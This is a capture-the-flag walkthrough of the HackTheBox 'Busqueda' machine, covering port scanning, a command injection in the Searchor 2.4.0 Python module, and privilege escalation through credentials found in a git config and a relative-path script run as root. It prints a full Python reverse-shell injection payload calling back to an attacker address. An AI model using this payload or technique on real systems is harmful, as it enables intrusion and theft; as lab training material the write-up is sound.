HTB - Busqueda

HTB – Busqueda

In this walk through, we will be going through the Busqueda room from HackTheBox. This room is rated as Easy on the platform and it consists of Enumeration, Exploitation and Privilege Escalation of a Linux boot2root machine. So, let’s get started without any delay.

Busqueda

Machine Info:

TitleBusqueda
IPaddress10.10.11.208
DifficultyEasy
OSLinux
DescriptionBusqueda is an Easy Difficulty Linux machine that involves exploiting a command injection vulnerability present in a Python module. To get root, we logged into the local gitea service by getting creds in a config file and then abused a python file running as root to get root.

Enumeration:

  • I started off with a regular nmap scan with service detection and found two ports opened – 22 (SSH) and 80 (HTTP)

$ sudo nmap -sS -sV 10.10.11.208

Nmap scan report for 10.10.11.208
Host is up (0.22s latency).
Not shown: 997 closed ports
PORT   STATE    SERVICE VERSION
22/tcp open     ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
53/tcp filtered domain
80/tcp open     http    Apache httpd 2.4.52
Service Info: Host: searcher.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.75 seconds

nmap scan

  • I tried to access the webserver running on port 80 and it was resolving to a hostname – searcher.htb. So added it to my /etc/hosts file and accessed the application.

adding hostname

  • The Searcher application was a web app developed to search with custom queries using different search engines and online networks. I tried to search for some pussies using google with auto-redirect unchecked and it seems like the application is forming a search URL with our searched term for the desired search engine.

Searcher

Looking for pussies

searching for pussies

  • Fired up gobuster to see if we can find some interesting directories however got no luck with it.

$ gobuster dir -u http://searcher.htb/ -w ~/Desktop/Wordlist/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://searcher.htb/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/12/01 13:24:51 Starting gobuster in directory enumeration mode
===============================================================
/search               (Status: 405) [Size: 153]
/server-status        (Status: 403) [Size: 277]
                                               
===============================================================
2023/12/01 13:26:39 Finished
===============================================================

gobuster scan

  • Next, i intercepted the search request using Burpsuite and in the response field, found an interesting header named server which shows the application is developed in python 3.10.6 with Werkzeug (Flask) 2.1.2. Searched for any known exploits for the flask version but found nothing.

Burpsuite POST intercept

Burpsuite Response

  • Next, the footer caught my attention as there is a python module name – Searchor is mentioned along with its version – 2.4.0

Searcher 2.4.0 running

  • Searched for any known exploit for the concerned module and found an exploit POC for that. As per the POC, the vulnerability lies in the eval() function which let us run arbitrary commands on the server and thus leads to command injection. Bingo!

Searcher 2.4.0 exploit

Arbitrary CMD Injection

Initial Access:

  • Next, used the below python reverse shell payload to get initial access on the web server and captured the user flag.

', exec("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.14.2',4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);"))#

reverse shell payload

getting the shell

user.txt

Privilege Escalation:

  • To find potential privilege escalation vectors, uploaded linpeas on the target and executed it.

uploading linpeas

  • The linpeas result shows some interesting directories which has some git config files. Looked into the config file for the flask application running and it reveals a new domain named “gitea.searcher.htb” and the user password.

Linpeas output

git creds

  • Added the new domain to our /etc/hosts file and logged into it using the found credentials. The application had 1 commit done by the administrator which has a SHA1 hash alongside it.

adding hostname

gitea login

hash identifier

  • Moving on, checked the sudo permissions for the user svc using the found password. As per the result, we found out that we can run the system-checkup.py script as user root.

sudo -l

sudo -l

  • Checked the working of the script using the whoami command and it throws me an error showcasing the usage. The script takes three commands as arguments – docker ps, docker inspect and full checkup.

executing the script

  • I tried to run script with full-checkup as argument from my home directory and it failed. That means, it is using a relative path for the full-checkup script instead of absolute.

checking the script

full checkup

  • I developed a script to view the contents of the root.txt file with the same name as full-checkup in the /tmp directory and executed it with the help of system-checkup.py script. Thus, getting the root flag.

getting root

Machine completed

Also Read: Webgoat – Without password

Conclusion:

Conclusion

So that was “Busqueda” for you. We started off with our regular nmap scan and found two ports opened – 22 (SSH) and 80 (HTTP). Next, enumerated the web server on port 80 and found a searcher application running which was using the searcher 2.4.0 python module. Looked for any known exploits related to it and found one. Used it to get the initial access on the target. For privilege escalation, found the git creds in a git config file. With the help of that, logged into the gitea subdomain and found password for user svc. At last, abused the system-checkup.py script to get root. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top